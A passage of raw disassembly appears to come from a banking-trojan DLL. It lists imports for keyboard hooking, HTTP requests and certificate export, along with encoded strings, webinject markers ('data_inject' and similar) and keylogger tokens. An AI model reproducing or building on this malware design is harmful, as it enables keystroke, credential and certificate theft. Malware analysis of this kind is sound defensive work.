db 1, 47h, 65h
aTfilesize db 'tFileSize',0
a4 db '4',0
aCreatefilea db 'CreateFileA',0
db 0F9h ; ù
db 2, 6Ch, 73h
aTrcata db 'trcatA',0
align 4
db 24h ; $
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
dw 126h
aGetmodulehandl db 'GetModuleHandleA',0
align 2
dw 2FCh
aLstrcmpa db 'lstrcmpA',0
align 2
dw 13Eh
aGetprocaddress db 'GetProcAddress',0
align 4
dd 6F4C01C2h, 694C6461h, 72617262h, 4179h, 6F4C01CCh, 466C6163h
dd 656572h, 6F4C01C8h, 416C6163h, 636F6C6Ch, 26C0000h
dd 46746553h, 54656C69h, 656D69h, 725702DFh, 46657469h
dd 656C69h, 6553026Ah, 6C694674h, 696F5065h, 7265746Eh
dd 1590000h
aGetsystemdirec db 'GetSystemDirectoryA',0
db 0D2h ; Ò
db 2, 57h, 69h
aDechartomultib db 'deCharToMultiByte',0
dw 1E4h
aMultibytetowid db 'MultiByteToWideChar',0
db 0A1h ; ¡
db 2, 54h, 68h
aRead32next db 'read32Next',0
align 4
db 0A0h ;
db 2, 54h, 68h
aRead32first db 'read32First',0
db 'L',0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
align 10h
db 0F8h ; ø
align 2
aGetcurrentproc db 'GetCurrentProcessId',0
db '~',0
aExitthread db 'ExitThread',0
align 4
aJ db 'J',0
aCreatethread db 'CreateThread',0
align 4
dd 6547016Dh, 63695474h, 756F436Bh, 746Eh, 65470166h, 6D655474h
dd 74615070h, 5768h, 6552022Bh, 45746573h, 746E6576h, 2CE0000h
aWaitforsingleo db 'WaitForSingleObject',0
db '´',0
aFreelibrary db 'FreeLibrary',0
dw 1B0h
aInterlockedinc db 'InterlockedIncrement',0
align 2
dw 1ADh
aInterlockeddec db 'InterlockedDecrement',0
align 2
dw 0FAh
aGetcurrentthre db 'GetCurrentThreadId',0
align 4
db 65h ; e
db 2, 53h, 65h
aTevent db 'tEvent',0
align 4
db 0F7h ; ÷
align 2
aGetcurrentpr_0 db 'GetCurrentProcess',0
dd 6F4D01DDh, 69466576h, 41656Ch, 65440057h, 6574656Ch
dd 656C6946h, 1140041h, 46746547h, 54656C69h, 656D69h
dd 6C530296h, 706565h, 6946009Dh, 654E646Eh, 69467478h
dd 41656Ch, 69460090h, 6C43646Eh, 65736Fh, 69460094h, 6946646Eh
dd 46747372h, 41656C69h, 1040000h, 44746547h, 65766972h
dd 65707954h, 1200041h, 4C746547h, 6369676Fh, 72446C61h
dd 73657669h, 2610000h, 45746553h, 664F646Eh, 656C6946h
dd 2680000h
aSetfileattribu db 'SetFileAttributesA',0
align 4
db 65h ; e
db 1, 47h, 65h
aTtemppatha db 'tTempPathA',0
align 4
db 6
db 2, 51h, 75h
aEryperformance db 'eryPerformanceCounter',0
a1_2 db '1',0
aCreateeventa db 'CreateEventA',0
align 2
dw 15Dh
aGetsystemtime db 'GetSystemTime',0
dw 2FFh
aLstrcmpia db 'lstrcmpiA',0
dw 175h
aGetversionexa db 'GetVersionExA',0
dw 11Ch
aGetlocaleinfoa db 'GetLocaleInfoA',0
align 4
db 0C1h ; Á
db 1, 4Ch, 65h
aAvecriticalsec db 'aveCriticalSection',0
align 4
aF db 'f',0
aEntercriticals db 'EnterCriticalSection',0
align 4
db 0AAh ; ª
db 1, 49h, 6Eh
aItializecritic db 'itializeCriticalSection',0
db 5Fh ; _
db 1, 47h, 65h
aTsystemtimeasf db 'tSystemTimeAsFileTime',0
dw 276h
aSetnamedpipeha db 'SetNamedPipeHandleState',0
dd 615702D1h, 614E7469h, 5064656Dh, 57657069h, 0AA0000h
dd 73756C46h, 6C694668h, 66754265h, 73726566h, 370000h
dd 61657243h, 69466574h, 57656Ch, 72430045h, 65746165h
dd 636F7250h, 57737365h, 1250000h
aGetmodulefilen db 'GetModuleFileNameW',0
align 4
dd 6547011Ah, 73614C74h, 72724574h, 726Fh, 654700F9h, 72754374h
dd 746E6572h, 65726854h, 6461h, 6C5402A5h, 74655373h, 756C6156h
dd 2A20065h, 41736C54h, 636F6C6Ch, 2A30000h, 46736C54h
dd 656572h, 6548019Fh, 72467061h, 6565h, 65480199h, 6C417061h
dd 636F6Ch, 65470140h, 6F725074h, 73736563h, 70616548h
dd 454B0000h, 4C454E52h, 642E3233h, 6C6Ch, 654700EDh, 616C4374h
dd 614E7373h, 41656Dh, 6E4500BDh, 68436D75h, 57646C69h
dd 6F646E69h, 7377h, 65530214h, 654D646Eh, 67617373h, 4165h
dd 695702A9h, 776F646Eh, 6D6F7246h, 6E696F50h, 1460074h
dd 53746547h, 65747379h, 74654D6Dh, 73636972h, 0E10000h
dd 41746547h, 7365636Eh, 726F74h, 73490192h, 646E6957h
dd 6956776Fh, 6C626973h, 0CD0065h
aEnumthreadwind db 'EnumThreadWindows',0
dw 2ADh
aWsprintfw db 'wsprintfW',0
dw 195h
aKilltimer db 'KillTimer',0
dw 286h
aUnhookwindowsh db 'UnhookWindowsHookEx',0
db 62h ; b
db 2, 53h, 65h
aTwindowshookex db 'tWindowsHookExA',0
db 62h ; b
db 1, 47h, 65h
aTwindowthreadp db 'tWindowThreadProcessId',0
align 4
dd 61430015h, 654E6C6Ch, 6F487478h, 78456B6Fh, 2170000h
aSendmessagetim db 'SendMessageTimeoutA',0
db 0
db 2, 52h, 65h
aGisterwindowme db 'gisterWindowMessageA',0
align 2
dw 20Ah
aScreentoclient db 'ScreenToClient',0
align 4
db 0FCh ; ü
align 2
aGetcursorpos db 'GetCursorPos',0
align 4
db 78h ; x
db 2, 54h, 6Fh
aAsciiex db 'AsciiEx',0
db 13h
db 1, 47h, 65h
aTkeyboardlayou db 'tKeyboardLayout',0
db 17h
db 1, 47h, 65h
aTkeyboardstate db 'tKeyboardState',0
align 4
db 0Ah,0
aAttachthreadin db 'AttachThreadInput',0
dd 65470108h, 726F4674h, 6F726765h, 57646E75h, 6F646E69h
dd 0B20077h, 77617244h, 74786554h, 2AC0057h, 72707377h
dd 66746E69h, 0AF0041h, 77617244h, 74786554h, 950041h
dd 70736944h, 68637461h, 7373654Dh, 41656761h, 2820000h
dd 6E617254h, 74616C73h, 73654D65h, 65676173h, 12A0000h
dd 4D746547h, 61737365h, 416567h, 65530252h, 6D695474h
dd 7265h, 694600D4h, 65526C6Ch, 7463h, 65520203h, 7361656Ch
dd 434465h, 654700FDh, 434474h, 784500D3h, 69577469h, 776F646Eh
dd 784573h, 654D01BEh, 67617373h, 786F4265h, 53550041h
dd 32335245h, 6C6C642Eh, 530000h, 656C6544h, 624F6574h
dd 7463656Ah, 500000h, 656C6544h, 43446574h, 1C70000h
dd 656C6553h, 624F7463h, 7463656Ah, 110000h, 42746942h
dd 746Ch, 72430029h, 65746165h, 706D6F43h, 62697461h, 6942656Ch
dd 70616D74h, 1CD0000h, 42746553h, 6C6F436Bh, 726Fh, 655301F3h
dd 78655474h, 6C6F4374h, 726Fh, 7243002Ah, 65746165h, 706D6F43h
dd 62697461h, 4344656Ch, 370000h, 61657243h, 6F466574h
dd 6E49746Eh, 65726964h, 417463h, 7243004Dh, 65746165h
dd 696C6F53h, 75724264h, 6873h, 33494447h, 6C642E32h, 15B006Ch
dd 43676552h, 65736F6Ch, 79654Bh, 6552017Bh, 65755167h
dd 61567972h, 4565756Ch, 4178h, 6552016Ah, 756E4567h, 6C61566Dh
dd 416575h, 65520167h, 756E4567h, 79654B6Dh, 417845h, 65520172h
dd 65704F67h, 79654B6Eh, 417845h, 6552016Ch, 756C4667h
dd 654B6873h, 1860079h, 53676552h, 61567465h, 4565756Ch
dd 4178h, 6552015Fh, 65724367h, 4B657461h, 78457965h, 170041h
dd 756A6441h, 6F547473h, 506E656Bh, 69766972h, 6567656Ch
dd 0F50073h, 6B6F6F4Ch, 72507075h, 6C697669h, 56656765h
dd 65756C61h, 1420041h, 6E65704Fh, 636F7250h, 54737365h
dd 6E656B6Fh, 1640000h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 65520162h, 6C654467h, 4B657465h, 417965h, 72430064h
dd 47747079h, 72507465h, 6150766Fh, 6D6172h, 6552016Bh
dd 756E4567h, 6C61566Dh, 576575h, 41564441h, 32334950h
dd 6C6C642Eh, 530000h, 6E556F43h, 74696E69h, 696C6169h
dd 657Ah, 6F43002Dh, 74696E49h, 696C6169h, 657Ah, 4C430006h
dd 46444953h, 536D6F72h, 6E697274h, 6C6F0067h, 2E323365h
dd 6C6C64h, 41454C4Fh, 32335455h, 6C6C642Eh, 0B0000h, 72636544h
dd 4D747079h, 61737365h, 6567h, 6E45000Fh, 70797263h, 73654D74h
dd 65676173h, 65530000h, 33727563h, 6C642E32h, 35006Ch
dd 53415357h, 646E65h, 53570025h, 636F4941h, 6C74h, 5F325357h
dd 642E3233h, 6C6Ch, 6E490083h, 6E726574h, 65537465h, 61745374h
dd 43737574h, 626C6C61h, 6B6361h, 7448004Ah, 65537074h
dd 6552646Eh, 73657571h, 41784574h, 740000h, 65746E49h
dd 74656E72h, 72657551h, 74614479h, 61764161h, 62616C69h
dd 656Ch, 74480049h, 65537074h, 6552646Eh, 73657571h, 4174h
dd 7448004Ch, 65537074h, 6552646Eh, 73657571h, 5774h, 74480045h
dd 704F7074h, 65526E65h, 73657571h, 4174h, 6E490071h, 6E726574h
dd 704F7465h, 72556E65h, 416Ch, 6E490078h, 6E726574h, 65527465h
dd 69466461h, 7845656Ch, 880041h, 65746E49h, 74656E72h
dd 74697257h, 6C694665h, 770065h, 65746E49h, 74656E72h
dd 64616552h, 656C6946h, 5A0000h, 65746E49h, 74656E72h
dd 6E6E6F43h, 41746365h, 320000h, 55746547h, 61436C72h
dd 45656863h, 7972746Eh, 6F666E49h, 560041h, 65746E49h
dd 74656E72h, 736F6C43h, 6E614865h, 656C64h, 6E490075h
dd 6E726574h, 75517465h, 4F797265h, 6F697470h, 416Eh, 494E4957h
dd 2E54454Eh, 6C6C64h, 724300A2h, 4D747079h, 6C416D65h
dd 636F6Ch, 6543000Fh, 6C437472h, 5365736Fh, 65726F74h
dd 740000h, 70797243h, 71634174h, 65726975h, 74726543h
dd 63696669h, 50657461h, 61766972h, 654B6574h, 290079h
dd 74726543h, 6D756E45h, 74726543h, 63696669h, 73657461h
dd 74536E49h, 65726Fh, 4650010Ah, 706D4958h, 4374726Fh
dd 53747265h, 65726F74h, 3C0000h, 74726543h, 65657246h
dd 74726543h, 63696669h, 43657461h, 65746E6Fh, 7478h, 724300A3h
dd 4D747079h, 72466D65h, 6565h, 46500109h, 70784558h, 4374726Fh
dd 53747265h, 65726F74h, 7845h, 65430004h, 64417472h, 72654364h
dd 69666974h, 65746163h, 746E6F43h, 54747865h, 6F74536Fh
dd 6572h, 65430050h, 704F7472h, 74536E65h, 65726Fh, 6543001Bh
dd 72437472h, 65746165h, 666C6553h, 6E676953h, 74726543h
dd 63696669h, 657461h, 65430064h, 74537472h, 4E6F5472h
dd 41656D61h, 450000h, 74726543h, 4E746547h, 53656D61h
dd 6E697274h, 4167h, 6543001Eh, 65447472h, 6574656Ch, 74726543h
dd 63696669h, 46657461h, 536D6F72h, 65726F74h, 52430000h
dd 33545059h, 6C642E32h, 24C006Ch, 6F6C6366h, 6573h, 7266025Dh
dd 646165h, 6F660257h, 6E6570h, 77660266h, 65746972h, 420000h
dd 5F48455Fh, 6C6F7270h, 676Fh, 6D5F0169h, 626E7362h, 706D6369h
dd 2980000h, 6D6D656Dh, 65766Fh, 6D5F017Ch, 74737362h
dd 1650072h, 73626D5Fh, 6D63626Eh, 15F0070h, 73626D5Fh
dd 706D6369h, 2640000h, 6C657466h, 262006Ch, 65657366h
dd 1C5006Bh, 7274735Fh, 6D63696Eh, 1C30070h, 7274735Fh
dd 72776Ch, 695F0134h, 616F74h, 735F01C1h, 63697274h, 706Dh
dd 70660259h, 637475h, 657202AAh, 646E6977h, 2490000h
dd 74697865h, 2D90000h, 72706676h, 66746E69h, 29F0000h
dd 63747570h, 410000h, 7878435Fh, 6F726854h, 63784577h
dd 69747065h, 6E6Fh, 3F3F000Eh, 70797431h, 6E695F65h, 40406F66h
dd 40454155h, 5A58h, 695602C6h, 61757472h, 6575516Ch, 7972h
dd 6E4901ACh, 6C726574h, 656B636Fh, 6D6F4364h, 65726170h
dd 68637845h, 65676E61h, 2C30000h, 74726956h, 506C6175h
dd 65746F72h, 7463h, 6552022Ch, 656D7573h, 65726854h, 6461h
dd 6C4600ABh, 49687375h, 7274736Eh, 69746375h, 61436E6Fh
dd 656863h, 65470167h, 72685474h, 43646165h, 65746E6Fh
dd 7478h, 65530283h, 72685474h, 43646165h, 65746E6Fh, 7478h
dd 75530298h, 6E657073h, 72685464h, 646165h, 695602BBh
dd 61757472h, 6C6C416Ch, 636Fh, 65530271h, 73614C74h, 72724574h
dd 726Fh, 6E4901AEh, 6C726574h, 656B636Fh, 63784564h, 676E6168h
dd 20B0065h, 73696152h, 63784565h, 69747065h, 6E6Fh, 734900E5h
dd 74786554h, 63696E55h, 65646Fh, 0
a6j db '{+6J',0
align 4
dd 21B42h, 3 dup(1), 21B38h, 21B3Ch, 21B40h, 1361Ah, 21B4Fh
dd 736D0000h, 6C633233h, 642E646Fh, 4E006C6Ch, 456C6C75h
dd 726F7078h, 74h, 29h dup(0)
_rdata ends
; Section 3. (virtual address 00022000)
; Virtual size : 0005889C ( 362652.)
; Section size in file : 00002400 ( 9216.)
; Offset to raw data for section: 00020400
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 10022000h
dword_10022000 dd 0 dd offset sub_10001000
dd offset sub_10001053
dd offset sub_1000107A
dd offset sub_1000FBC2
dd offset sub_1000FDD1
dd offset sub_10018A8D
dd offset sub_1001C95F
dword_10022020 dd 4 dup(0) ; int off_10022030
off_10022030 dd offset dword_10022118 ; DATA XREF: sub_100020B5+375�r
; sub_1000291D+94�r ...
; char *off_10022034
off_10022034 dd offset dword_10022120 ; DATA XREF: sub_1000B7EF+48D�r
; char *off_10022038
off_10022038 dd offset dword_1002216C ; DATA XREF: sub_1000A318+A41�r
; LPCSTR lpValueName
lpValueName dd offset dword_100221A4 ; DATA XREF: sub_1000A318+A3A�r
; char *off_10022040
off_10022040 dd offset dword_10073984 ; DATA XREF: sub_1000A318+A34�r
; char *off_10022044
off_10022044 dd offset dword_100221B4 ; DATA XREF: sub_1000A318+7A1�r
; sub_1000B027+4AE�r ...
; char *off_10022048
off_10022048 dd offset dword_100221EC ; DATA XREF: sub_1000B7EF+50F�r
dd offset dword_10022224
; char *off_10022050
off_10022050 dd offset aJIKI ; DATA XREF: TimerFunc+2E3�r
; sub_10009FE2+48�r ...
; "šÏ†šÅ›ÅÝŊ؈"
dd offset aJIKI_0 ; "šÏ†šÒ›ÅÝŊĈ"
dd offset dword_10022250
; char *off_1002205C
off_1002205C dd offset aI ; DATA XREF: sub_1000A318+596�r
; sub_1000B7EF+F3�r
; "ÅÆÁ›ÑÔÁ"
; char *off_10022060
off_10022060 dd offset aI_0 ; DATA XREF: sub_1000B7EF+116�r
; "ÜÆÁ›ÑÔÁ"
; char *off_10022064
off_10022064 dd offset dword_1002226C ; DATA XREF: sub_1000A318+623�r
; char *off_10022068
off_10022068 dd offset aSI ; DATA XREF: StartAddress+75E�r
; sub_1000A318+138�r
; "éÖØ›ÑÔÁ"
; char *off_1002206C
off_1002206C dd offset aSI_0 ; DATA XREF: sub_10016C4C+3E5�r
; "éÅÇÁ›ÑÔÁ"
; char *off_10022070
off_10022070 dd offset aPss ; DATA XREF: sub_1000A318+94A�r
; sub_1000A318+97B�r ...
; "ÖééÛÁÙÑÇ"
; char *off_10022074
off_10022074 dd offset aPssI ; DATA XREF: sub_1000A318+89D�r
; sub_1000A318+8CD�r ...
; "Öéé×ÚÚÁ›ÜÛÜ"
; char *off_10022078
off_10022078 dd offset aMjgni ; DATA XREF: sub_1000291D+9B�r
; sub_10009FE2+2A8�r ...
; "ÅÐÇÓÏŒ†ƒ›ÑÔÁ"
; char *off_1002207C
off_1002207C dd offset aSGavji ; DATA XREF: sub_1000B536+15E�r
; "éÅÐÇÓÖƒ€‚†›ÑÔÁ"
; char *off_10022080
off_10022080 dd offset aSVgnji ; DATA XREF: sub_1000B536+DB�r
; "éÅÐÇÓÖ‚ƒ†›ÑÔÁ"
; char *off_10022084
off_10022084 dd offset aI_1 ; DATA XREF: sub_100020B5+37C�r
; "ÅÆÁÚÇÐÖ›ÑÙÙ"
dd offset dword_100222E8
; char *off_1002208C
off_1002208C dd offset aI_2 ; DATA XREF: sub_10016C4C+118�r
; "ÂÜÛÜÛÐÁ›ÑÙÙ"
; char *off_10022090
off_10022090 dd offset dword_10022330 ; DATA XREF: sub_10016C4C+13E�r
; char *off_10022094
off_10022094 dd offset aDIKI ; DATA XREF: sub_10016C4C+6A1�r
; sub_10016C4C+710�r
; "šÅ„šÒ›ÅÝÅŠÜш"
; char *off_10022098
off_10022098 dd offset dword_1002235C ; DATA XREF: sub_10016C4C+256�r
; char *off_1002209C
off_1002209C dd offset dword_10022360 ; DATA XREF: sub_10016C4C+222�r
; char *off_100220A0
off_100220A0 dd offset asc_10022364 ; DATA XREF: sub_10016C4C+D8�r
; "ÙÜÆÁÐÛ"
; char *off_100220A4
off_100220A4 dd offset dword_1002236C ; DATA XREF: sub_10016C4C+64B�r
; LPCSTR off_100220A8
off_100220A8 dd offset aRRsI ; DATA XREF: sub_10016C4C+644�r
; "ÂÜÛÑÜÇéÐÍÅÙÚÇÐÇ›ÐÍÐ"
; char *off_100220AC
off_100220AC dd offset dword_100223FC ; DATA XREF: sub_10016C4C+63E�r
; char *off_100220B0
off_100220B0 dd offset dword_10022428 ; DATA XREF: sub_10016C4C+569�r
; sub_10016C4C+628�r
; char *off_100220B4
off_100220B4 dd offset dword_10022498 ; DATA XREF: sub_10016C4C+53C�r
; sub_10016C4C+5FB�r
; char *off_100220B8
off_100220B8 dd offset aIQiQiQiDzqiQiD ; DATA XREF: sub_100100FD+65�r
; "›ÅÓÍŸ›ÖÐÇŸ›ÖÇÁŸ›Å„‡Ÿ›ÆÅÖŸ›Å„‡Ÿ›ÆÁÙŸ›ÖÇÙ"...
; char *off_100220BC
off_100220BC dd offset dword_100224D8 ; DATA XREF: sub_1000FFF9+90�r
; char *off_100220C0
off_100220C0 dd offset aSAmjzi ; DATA XREF: sub_1000B7EF+73A�r
; "éÅÐÇÓÖ€Œ†‡›ÑÔÁ"
; char *off_100220C4
off_100220C4 dd offset dword_10022504 ; DATA XREF: sub_1000EB30+583�r
; char *off_100220C8
off_100220C8 dd offset aSSS_0 ; DATA XREF: sub_1000A318+3D8�r
; "éÑÇÜÃÐÇÆéÐÁÖéÝÚÆÁÆ"
; char *off_100220CC
off_100220CC dd offset aI_3 ; DATA XREF: sub_1000B7EF+13A�r
; sub_10016C4C+1B7�r
; "ÏÔÜÞÚÑ›ÖÛ"
; char *off_100220D0
off_100220D0 dd offset aI_4 ; DATA XREF: sub_1000B7EF+171�r
; sub_10016C4C+1EF�r
; "ßÜÑÇÞÔ›ÖÛ"
; char *SubStr
SubStr dd offset aData_before ; DATA XREF: sub_100015CE+32A�r
; sub_100015CE+373�r ...
; "data_before"
dd offset aData_inject ; "data_inject"
dd offset aData_after ; "data_after"
dd offset aData_end ; "data_end"
dword_100220E4 dd 1 dword_100220E8 dd 1 dd 2 dup(1)
; LPCSTR lpString2
lpString2 dd offset aTb ; DATA XREF: .text:loc_10004CAE�r
; sub_10004DAA:loc_10004EFD�r
; "<tb>"
; LPCSTR off_100220F8
off_100220F8 dd offset aBs ; DATA XREF: .text:loc_10004CC3�r
; sub_10004DAA:loc_10004F1D�r
; "<bs>"
; LPCSTR off_100220FC
off_100220FC dd offset aDl ; DATA XREF: .text:loc_10004CD9�r
; sub_10004DAA:loc_10004F3D�r
; "<dl>"
; LPCSTR off_10022100
off_10022100 dd offset aSp ; DATA XREF: .text:loc_10004CEF�r
; sub_10004DAA:loc_10004F5C�r
; "<sp>"
; LPCSTR off_10022104
off_10022104 dd offset aEs ; DATA XREF: .text:loc_10004D04�r
; sub_10004DAA:loc_10004F7C�r
; "<es>"
; LPCSTR lpchText
lpchText dd offset aCl ; DATA XREF: sub_100050D9+1E1�r
; "<cl>"
off_1002210C dd offset aEnter ; DATA XREF: .text:loc_10004BB9�r
; "<enter>"
dword_10022110 dd 0FFFFFFFFh ; sub_10003786+FE�r ...
; int off_10022114
off_10022114 dd offset aAb0cdef1gh2ij3 ; DATA XREF: .text:10005B17�r
; StartAddress+172�r ...
; "ab0cdef1gh2ij3kl4mno5pqr6stu7vw8xyz9"
dword_10022118 dd 0CAFAF4E8h, 99hdword_10022120 dd 0E1F3FAE6h, 0F0E7F4E2h, 0D6DCF8E9h, 0DAC6DAC7h, 0E2E9C1D3h
; DATA XREF: .data:off_10022034�o
dd 0DAD1DBDCh, 0F6E9C6C2h, 0D0C7C7C0h, 0D0E3C1DBh, 0DADCC6C7h
dd 0CDF0E9DBh, 0C7DAD9C5h, 0F7E9C7D0h, 0C6C2DAC7h, 0FD95C7D0h
dd 0D0C5D9D0h, 0D7FA95C7h, 0C1D6D0DFh, 0C6h
dword_1002216C dd 0E1F3FAE6h, 0F0E7F4E2h, 0D6DCF8E9h, 0DAC6DAC7h, 0E2E9C1D3h
; DATA XREF: .data:off_10022038�o
dd 0DAD1DBDCh, 0FB95C6C2h, 0C0F6E9E1h, 0DBD0C7C7h, 0C7D0E3C1h
dd 0DBDADCC6h, 0DBDCE2E9h, 0C6C2DAD1h, 0
dword_100221A4 dd 0FCC5C5F4h, 0EAC1DCDBh, 0C6F9F9F1h, 0dword_100221B4 dd 0C1D3DAE6h, 0D0C7D4C2h, 0D6DCF8E9h, 0DAC6DAC7h, 0E2E9C1D3h
; DATA XREF: .data:off_10022044�o
dd 0DAD1DBDCh, 0F6E9C6C2h, 0D0C7C7C0h, 0D0E3C1DBh, 0DADCC6C7h
dd 0E6F8E9DBh, 0C1DBDAF6h, 0C6D9DAC7h, 0
dword_100221EC dd 0E1F3FAE6h, 0F0E7F4E2h, 0D6DCF8E9h, 0DAC6DAC7h, 0E2E9C1D3h
; DATA XREF: .data:off_10022048�o
dd 0DAD1DBDCh, 0FB95C6C2h, 0C0F6E9E1h, 0DBD0C7C7h, 0C7D0E3C1h
dd 0DBDADCC6h, 0DBDCE2E9h, 0DAD2DAD9h, 0DBh
dword_10022224 dd 0F1F6F3E6h, 0D7D4C6DCh, 0D0D9haJIKI db 'šÏ†šÅ›ÅÝŊ؈',0 ; DATA XREF: .data:off_10022050�o
align 10h
aJIKI_0 db 'šÏ†šÒ›ÅÝŊĈ',0 ; DATA XREF: .data:10022054�o
align 10h
dword_10022250 dd 0DAC5CDF0h, 0D0E6C1C7h, 0C1C7haI db 'ÅÆÁ›ÑÔÁ',0 ; DATA XREF: .data:off_1002205C�o
aI_0 db 'ÜÆÁ›ÑÔÁ',0 ; DATA XREF: .data:off_10022060�o
dword_1002226C dd 0D9D0DDE6h, 0D0CDF0D9h, 0D0C1C0D6h, 0F4haSI db 'éÖØ›ÑÔÁ',0 ; DATA XREF: .data:off_10022068�o
aSI_0 db 'éÅÇÁ›ÑÔÁ',0 ; DATA XREF: .data:off_1002206C�o
align 10h
aPss db 'ÖééÛÁÙÑÇ',0 ; DATA XREF: .data:off_10022070�o
align 4
aPssI db 'Öéé×ÚÚÁ›ÜÛÜ',0 ; DATA XREF: .data:off_10022074�o
align 4
aMjgni db 'ÅÐÇÓÏŒ†ƒ›ÑÔÁ',0 ; DATA XREF: .data:off_10022078�o
align 4
aSGavji db 'éÅÐÇÓÖƒ€‚†›ÑÔÁ',0 ; DATA XREF: .data:off_1002207C�o
align 4
aSVgnji db 'éÅÐÇÓÖ‚ƒ†›ÑÔÁ',0 ; DATA XREF: .data:off_10022080�o
align 4
aI_1 db 'ÅÆÁÚÇÐÖ›ÑÙÙ',0 ; DATA XREF: .data:off_10022084�o
dword_100222E8 dd 0FCE6F9F6h, 0F1CEE9F1h, 8CF186F6h, 9886F0F0h, 8185868Dh
; DATA XREF: .data:10022088�o
dd 87878198h, 0F1F4988Dh, 879887F6h, 85F18186h, 0F0F38086h
dd 0C88C8DF7h, 0C5DBFCE9h, 0E6D6DAC7h, 0D0C3C7D0h, 8786C7h
aI_2 db 'ÂÜÛÜÛÐÁ›ÑÙÙ',0 ; DATA XREF: .data:off_1002208C�o
dword_10022330 dd 0D0C1DBFCh, 0C1D0DBC7h, 0F6C1D0F2h, 0D0DBDBDAh, 0D1D0C1D6h
; DATA XREF: .data:off_10022090�o
dd 0C1D4C1E6h, 0D0h
aDIKI db 'šÅ„šÒ›ÅÝÅŠÜш',0 ; DATA XREF: .data:off_10022094�o
align 4
dword_1002235C dd 0F9E6F1h dword_10022360 dd 0FBF4F9h asc_10022364 db 'ÙÜÆÁÐÛ',0 ; DATA XREF: .data:off_100220A0�o
align 4
dword_1002236C dd 0E1E6ECE6h, 0F6E9F8F0h, 0D0C7C7C0h, 0DAF6C1DBh, 0DAC7C1DBh
; DATA XREF: .data:off_100220A4�o
dd 0C1D0E6D9h, 0C7D0E6E9h, 0D0D6DCC3h, 0DDE6E9C6h, 0D1D0C7D4h
dd 0D0D6D6F4h, 0E5E9C6C6h, 0D8D4C7D4h, 0C7D0C1D0h, 0DCF3E9C6h
dd 0D4C2D0C7h, 0DAE5D9D9h, 0CCD6DCD9h, 0D4C1E6E9h, 0C7D4D1DBh
dd 0DAC7E5D1h, 0D0D9DCD3h, 0C1C0F4E9h, 0DCC7DADDh, 0F4D1D0CFh
dd 0DCD9C5C5h, 0DCC1D4D6h, 0E9C6DBDAh, 0C1C6DCF9h, 0
aRRsI db 'ÂÜÛÑÜÇéÐÍÅÙÚÇÐÇ›ÐÍÐ',0 ; DATA XREF: .data:off_100220A8�o
align 4
dword_100223FC dd 0DBDCC290h, 90C7DCD1h, 0C5CDD0E9h, 0D0C7DAD9h, 0CDD09BC7h
; DATA XREF: .data:off_100220AC�o
dd 8F9F8FD0h, 0D7D4DBF0h, 8FD1D0D9h, 0D9C5CDF0h, 0C7D0C7DAh
dd 0
dword_10022428 dd 0E1E6ECE6h, 0F6E9F8F0h, 0D0C7C7C0h, 0DAF6C1DBh, 0DAC7C1DBh
; DATA XREF: .data:off_100220B0�o
dd 0C1D0E6D9h, 0C7D0E6E9h, 0D0D6DCC3h, 0DDE6E9C6h, 0D1D0C7D4h
dd 0D0D6D6F4h, 0E5E9C6C6h, 0D8D4C7D4h, 0C7D0C1D0h, 0DCF3E9C6h
dd 0D4C2D0C7h, 0DAE5D9D9h, 0CCD6DCD9h, 0D4C1E6E9h, 0C7D4D1DBh
dd 0DAC7E5D1h, 0D0D9DCD3h, 0DAD9F2E9h, 0D9D9D4D7h, 0D0C5FACCh
dd 0C7DAE5DBh, 0F9E9C6C1h, 0C1C6DCh
dword_10022498 dd 0F08F9F8Fh, 0D9D7D4DBh, 0C58FD1D0h, 0C1C7DAh
; DATA XREF: .data:off_100220B4�o
aIQiQiQiDzqiQiD db '›ÅÓÍŸ›ÖÐÇŸ›ÖÇÁŸ›Å„‡Ÿ›ÆÅÖŸ›Å„‡Ÿ›ÆÁÙŸ›ÖÇÙŸ›Å‚×',0
; DATA XREF: .data:off_100220B8�o
align 4
dword_100224D8 dd 0C1C7D0F6h, 0DCC7E595h, 0D0C1D4C3h, 95CCD0FEh, 0C6C6D4C5h
; DATA XREF: .data:off_100220BC�o
dd 0D1C7DAC2h, 0
aSAmjzi db 'éÅÐÇÓÖ€Œ†‡›ÑÔÁ',0 ; DATA XREF: .data:off_100220C0�o
align 4
dword_10022504 dd 0C1D3DAE6h, 0D0C7D4C2h, 0D6DCF8E9h, 0DAC6DAC7h, 0E2E9C1D3h
; DATA XREF: .data:off_100220C4�o
dd 0DAD1DBDCh, 0F6E9C6C2h, 0D0C7C7C0h, 0D0E3C1DBh, 0DADCC6C7h
dd 0DBFCE9DBh, 0DBC7D0C1h, 0E695C1D0h, 0DCC1C1D0h, 0C6D2DBh
aSSS_0 db 'éÑÇÜÃÐÇÆéÐÁÖéÝÚÆÁÆ',0 ; DATA XREF: .data:off_100220C8�o
align 4
aI_3 db 'ÏÔÜÞÚÑ›ÖÛ',0 ; DATA XREF: .data:off_100220CC�o
align 10h
aI_4 db 'ßÜÑÇÞÔ›ÖÛ',0 ; DATA XREF: .data:off_100220D0�o
align 4
aData_before db 'data_before',0 ; DATA XREF: .data:SubStr�o
aData_inject db 'data_inject',0 ; DATA XREF: .data:100220D8�o
aData_after db 'data_after',0 ; DATA XREF: .data:100220DC�o
align 10h
aData_end db 'data_end',0 ; DATA XREF: .data:100220E0�o
align 4
aTb db '<tb>',0 ; DATA XREF: .data:lpString2�o
align 4
aBs db '<bs>',0 ; DATA XREF: .data:off_100220F8�o
align 4
aDl db '<dl>',0 ; DATA XREF: .data:off_100220FC�o
align 4
aSp db '<sp>',0 ; DATA XREF: .data:off_10022100�o
align 4
aEs db '<es>',0 ; DATA XREF: .data:off_10022104�o
align 4
aCl db '<cl>',0 ; DATA XREF: .data:lpchText�o
align 4
aEnter db '<enter>',0 ; DATA XREF: .data:off_1002210C�o
aAb0cdef1gh2ij3 db 'ab0cdef1gh2ij3kl4mno5pqr6stu7vw8xyz9',0 ; DATA XREF: .data:off_10022114�o
align 4
a? db '\/:*"<>|?',0 ; DATA XREF: sub_1000116E+6�o
align 4
asc_10022608 db 0Dh,0Ah,0 ; DATA XREF: .text:10001575�o
align 4
; char ModuleName[]
ModuleName db 'ms32clod',0 ; DATA XREF: sub_100015CE+6C�o
align 4
; char aSet_url[]
